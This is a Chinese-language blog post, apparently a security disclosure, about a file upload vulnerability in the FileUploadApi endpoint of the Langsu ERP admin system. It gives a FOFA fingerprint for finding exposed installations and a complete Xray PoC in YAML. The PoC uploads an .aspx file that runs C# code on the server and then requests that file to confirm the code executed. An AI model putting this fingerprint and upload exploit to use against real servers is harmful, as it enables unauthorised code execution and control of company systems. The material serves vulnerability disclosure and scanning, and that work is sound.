朗速ERP后台管理系统FileUploadApi存在文件上传漏洞

漏洞细节参考链接:https://mp.weixin.qq.com/s/nMRnxBicTEiKJtfT0R3wQA

 

漏洞介绍:

郎速 ERP 是一款功能强大的企业资源计划(ERP)软件,专为中小企业量身打造,旨在帮助企业优化管理流程、提升运营效率。不仅适用于制造业,还广泛适用于零售、物流、服务等多个行业。朗速ERP后台管理系统中的FileUploadApi接口文件存在文件上传漏洞,攻击者可利用该漏洞上传恶意文件,进而控制服务器或窃取企业敏感信息。

资产指纹:

  body="/Resource/Scripts/Yw/Yw_Bootstrap.js"

 Xray-poc:

name: poc-yaml-lum-soft-fileuploadapi-fileupload
manual: true
set:
  randint: randomInt(1000000, 9999999)
  rboundary: randomLowercase(16)
  randname: randomLowercase(6)
transport: http
rules:
  r0:
    request:
      cache: true
      method: POST
      path: /Api/FileUploadApi.ashx?method=DoWebUpload
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\";filename=\"{{randname}}.aspx\"\r\n\r\n<%@ Page Language=\"C#\"%><% Response.Write(\"{{randint}}\");System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>\r\n------WebKitFormBoundary{{rboundary}}--"
    expression: response.status == 200 && response.body_string.contains("WebRelPath")
    output:
      search: '"WebRelPath\":\"(?P<uploadfile>.+?).aspx\",".bsubmatch(response.body)'
      uploadfile: search["uploadfile"]
  r1:
    request:
      cache: true
      method: GET
      path: /{{uploadfile}}.aspx
    expression: response.status == 200 && response.body_string.contains(string(randint))
expression: r0() && r1()
detail:
  author: cysec
  links:
    - https://mp.weixin.qq.com/s/nMRnxBicTEiKJtfT0R3wQA
  description: 朗速ERP后台管理系统FileUploadApi存在文件上传漏洞
  fofakeyword: body="/Resource/Scripts/Yw/Yw_Bootstrap.js"

 

 

 

posted @ 2025-02-11 16:36  Cysec  阅读(13)  评论(0编辑  收藏  举报